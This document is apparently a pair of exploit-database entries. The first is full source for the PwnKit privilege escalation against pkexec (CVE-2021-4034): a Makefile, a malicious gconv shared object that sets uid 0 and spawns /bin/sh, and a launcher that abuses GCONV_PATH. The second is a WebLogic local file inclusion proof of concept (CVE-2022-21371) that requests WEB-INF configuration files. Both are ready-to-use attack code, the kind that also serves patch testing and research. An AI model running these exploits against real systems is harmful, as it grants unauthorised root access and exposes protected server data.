# Exploit Title: PolicyKit-1 0.105-31 - Privilege Escalation # Exploit Author: Lance Biggerstaff # Original Author: ryaagard (https://github.com/ryaagard) # Date: 27-01-2022 # Github Repo: https://github.com/ryaagard/CVE-2021-4034 # References: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt # Description: The exploit consists of three files `Makefile`, `evil-so.c` & `exploit.c` ##### Makefile ##### all: gcc -shared -o evil.so -fPIC evil-so.c gcc exploit.c -o exploit clean: rm -r ./GCONV_PATH=. && rm -r ./evildir && rm exploit && rm evil.so ################# ##### evil-so.c ##### #include <stdio.h> #include <stdlib.h> #include <unistd.h> void gconv() {} void gconv_init() { setuid(0); setgid(0); setgroups(0); execve("/bin/sh", NULL, NULL); } ################# ##### exploit.c ##### #include <stdio.h> #include <stdlib.h> #define BIN "/usr/bin/pkexec" #define DIR "evildir" #define EVILSO "evil" int main() { char *envp[] = { DIR, "PATH=GCONV_PATH=.", "SHELL=ryaagard", "CHARSET=ryaagard", NULL }; char *argv[] = { NULL }; system("mkdir GCONV_PATH=."); system("touch GCONV_PATH=./" DIR " && chmod 777 GCONV_PATH=./" DIR); system("mkdir " DIR); system("echo 'module\tINTERNAL\t\t\tryaagard//\t\t\t" EVILSO "\t\t\t2' > " DIR "/gconv-modules"); system("cp " EVILSO ".so " DIR); execve(BIN, argv, envp); return 0; } #################

# Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion # Date: 25/1/2022 # Exploit Author: Jonah Tan (@picar0jsu) # Vendor Homepage: https://www.oracle.com # Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html # Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 # Tested on: Windows Server 2019 # CVE : CVE-2022-21371 # Description Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Container). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebLogic Server accessible data. # PoC GET .//META-INF/MANIFEST.MF GET .//WEB-INF/web.xml GET .//WEB-INF/portlet.xml GET .//WEB-INF/weblogic.xml